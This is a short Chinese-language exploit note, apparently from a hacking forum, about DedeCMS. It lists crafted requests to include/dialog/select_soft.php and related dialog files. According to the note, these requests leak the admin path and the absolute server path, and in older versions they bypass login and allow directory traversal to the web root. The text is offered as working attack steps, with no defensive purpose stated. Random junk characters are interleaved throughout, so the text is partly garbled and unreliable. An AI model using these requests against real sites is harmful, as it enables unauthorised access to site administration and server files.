1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理1 F, K- x# l' Y2 e: o$ y q
2 Y5 m3 }2 Q' W9 a6 B
员帐号,新版本的就直接转向了后台.5 y, h/ x% }3 n% s" ]% e
2 O+ n# h6 i" O
2.include/dialog/config.php会爆出后台管理路径
! J" n3 p8 \& D% f S( G3 Y
# e2 i$ }+ e/ r3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
- {, R1 t, D7 i+ B- |( j# |0 W% A7 l9 b& o+ K, h+ s: _
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径./ c( I. n3 X# X: m
6 D: X* L- Q: _. g" W3 B1 L
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
/ d g4 @/ |$ p, O; D0 s' j$ b" s1 Z" t2 X2 r
到根目录去.不过这些版本的访问地址有些不同.- u/ j% e! B! V! `0 l' b
地址为require/dialog/select_soft.php?activepath=/././././././././
7 z* a) K/ O% k- N G' m! I% M* r# ~2 `: e) f; @ n
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦.. c8 q: t& Z$ N2 V% @* }
存在相同问题的文件还有2 Z2 s; K1 [" Y" |+ [
include\dialog\select_images.php0 u) c! R- K7 r: e
include\dialog\select_media.php/ I+ ?- w9 @ |: B$ u2 n
include\dialog\select_templets.php
* u2 `* s* }: s5 A% i |